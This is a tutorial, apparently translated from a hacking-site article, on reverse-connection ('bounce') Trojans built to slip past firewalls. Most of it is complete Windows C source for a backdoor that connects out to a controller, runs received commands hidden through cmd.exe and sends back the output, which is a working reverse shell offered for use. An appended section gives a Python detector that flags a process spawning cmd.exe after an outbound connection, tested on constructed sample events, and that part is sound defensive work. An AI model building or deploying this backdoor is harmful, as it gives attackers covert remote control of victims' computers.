As security incidents have multiplied, people have become increasingly aware of host protection. Firewalls and anti-virus products of all kinds now monitor inbound network connections, so the traditional Trojan horse that relies on a forward (inbound) connection no longer fits the current network environment. To keep remote control working, Trojan authors had to change their approach, which led to the adoption of reverse connection technology: the bounce Trojan. Many bounce Trojans exist today, but articles about their technical details are still rare. In order to monitor espionage that harms our great motherland, we need to implement reverse connection backdoors.
In essence, reverse connections and forward connections are not very different. With a forward connection, the server side (the controlled side) is implemented with the server-side programming model, while the control side is implemented with the client programming model. When we program the bounce method, we simply turn the controlled end into a client-side program and the control end into a server-side program. (Can readers follow this? I suspect it still sounds hazy.) Let's explain it through a simple programming example so that it becomes clear. Although the example below is small, it is representative: readers can learn how reverse connection technology is implemented, and readers who are not familiar with network programming can use it as an opportunity to get acquainted with network programming.
Taking the reverse connection as an example, let's look at how the controlled end (the end that initiates the connection and executes commands) is implemented.
```c
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char **argv)
{
    char *messages = "\r\n================ backconnect backdoor v0.1 ================\r\n"
                     "========== welcome to http://www.hackerxfiles.net =========\r\n";
    WSADATA wsadata;
    SOCKET sock;
    SOCKADDR_IN addr_in;
    char buf1[1024];                              // buffer for data received from the socket
    char buffer[2048] = {0};                      // data read back from the pipe
    char cmdline[MAX_PATH + sizeof(buf1) + 16];   // "<system dir>\cmd.exe /C " + received command
    memset(buf1, 0, sizeof(buf1));                // clear the receive buffer

    if (WSAStartup(MAKEWORD(2, 0), &wsadata) != 0) {
        printf("WSAStartup error. error:%d\n", WSAGetLastError());
        return 1;
    }
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80);                        // port of the remote host for the reverse connection
    addr_in.sin_addr.s_addr = inet_addr("127.0.0.1");    // IP address of the remote host
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
        printf("socket failed. error:%d\n", WSAGetLastError());
        return 1;
    }
    // connect out to the control host
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        printf("Connect failed. error:%d\n", WSAGetLastError());
        return 1;
    }
    // send the welcome message
    if (send(sock, messages, (int)strlen(messages), 0) == SOCKET_ERROR) {
        printf("Send failed. error:%d\n", WSAGetLastError());
        return 1;
    }

    for (;;) {
        SECURITY_ATTRIBUTES sa;
        HANDLE hread, hwrite;                     // anonymous pipe used to capture the command output
        STARTUPINFOA si;
        PROCESS_INFORMATION pi;
        DWORD bytesread;
        int len;

        memset(cmdline, 0, sizeof(cmdline));
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;                 // the child must inherit the write end of the pipe
        if (!CreatePipe(&hread, &hwrite, &sa, 0)) {
            printf("error on CreatePipe()");
            return 1;
        }
        si.cb = sizeof(STARTUPINFOA);
        GetStartupInfoA(&si);
        si.hStdError = hwrite;                    // redirect the child's stdout and stderr into the pipe
        si.hStdOutput = hwrite;
        si.wShowWindow = SW_HIDE;
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

        GetSystemDirectoryA(cmdline, MAX_PATH + 1);
        strcat(cmdline, "\\cmd.exe /C ");
        len = recv(sock, buf1, sizeof(buf1) - 1, 0);
        if (len == SOCKET_ERROR || len == 0) {    // the control host disconnected: the program exits
            CloseHandle(hread);
            CloseHandle(hwrite);
            exit(0);
        }
        buf1[len] = '\0';
        if (len <= 1) {                           // no usable command received
            send(sock, "error\n", (int)strlen("error\n"), 0);
            CloseHandle(hread);
            CloseHandle(hwrite);
            continue;
        }
        // append the received command to the cmd.exe command line
        strncat(cmdline, buf1, sizeof(cmdline) - strlen(cmdline) - 1);
        if (!CreateProcessA(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
            send(sock, "error command\n", (int)strlen("error command\n"), 0);
            CloseHandle(hread);
            CloseHandle(hwrite);
            continue;
        }
        CloseHandle(hwrite);                      // close our write end so ReadFile sees EOF when the child exits
        // read the command output from the pipe and send it back in a loop
        while (ReadFile(hread, buffer, sizeof(buffer) - 1, &bytesread, NULL) && bytesread > 0) {
            send(sock, buffer, (int)bytesread, 0);
        }
        CloseHandle(hread);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    return 0;
}
```
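From the defender's side, the program above leaves a recognisable host trace: one process initiates an outbound TCP connection and then repeatedly spawns `cmd.exe /C <command>` as its child. The following added example (written for this page, not code from the article) correlates constructed Sysmon-style records to flag that pattern; the field names and the sample events are assumptions made for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events in a Sysmon-like shape: id 3 = network connection
# initiated by a process, id 1 = process creation with its parent pid.
EVENTS = [
    {"id": 3, "t": "2024-05-01T10:00:00", "pid": 4100, "image": "C:\\Users\\u\\svchosts.exe",
     "dst_ip": "203.0.113.10", "dst_port": 80, "initiated": True},
    {"id": 1, "t": "2024-05-01T10:00:05", "pid": 4120, "ppid": 4100,
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "C:\\Windows\\system32\\cmd.exe /C whoami"},
    {"id": 1, "t": "2024-05-01T10:00:09", "pid": 4130, "ppid": 4100,
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "C:\\Windows\\system32\\cmd.exe /C ipconfig"},
    # benign: a browser connects out but never spawns a shell
    {"id": 3, "t": "2024-05-01T10:01:00", "pid": 5000, "image": "C:\\Program Files\\browser.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443, "initiated": True},
    # benign: explorer spawns cmd.exe /C, but explorer made no outbound connection
    {"id": 1, "t": "2024-05-01T10:01:30", "pid": 5200, "ppid": 900,
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /C dir"},
]


def find_reverse_shell_parents(events, window=timedelta(minutes=10), min_spawns=2):
    """Return {parent_pid: [cmdlines]} for processes that initiated an outbound
    connection and then spawned cmd.exe /C at least min_spawns times within window."""
    connected_at = {}
    for e in events:
        if e["id"] == 3 and e.get("initiated"):
            connected_at.setdefault(e["pid"], datetime.fromisoformat(e["t"]))
    hits = {}
    for e in events:
        if e["id"] != 1 or e["ppid"] not in connected_at:
            continue
        if not e["image"].lower().endswith("\\cmd.exe") or " /c " not in e["cmdline"].lower():
            continue
        delta = datetime.fromisoformat(e["t"]) - connected_at[e["ppid"]]
        if timedelta(0) <= delta <= window:   # shell spawned after, not before, the connection
            hits.setdefault(e["ppid"], []).append(e["cmdline"])
    return {pid: cmds for pid, cmds in hits.items() if len(cmds) >= min_spawns}


if __name__ == "__main__":
    for pid, cmds in find_reverse_shell_parents(EVENTS).items():
        print(f"suspicious parent pid {pid}: {len(cmds)} cmd.exe /C children after outbound connect")
```

The min_spawns threshold suppresses one-off helpers that legitimately shell out once; raise or lower it to fit the environment's baseline.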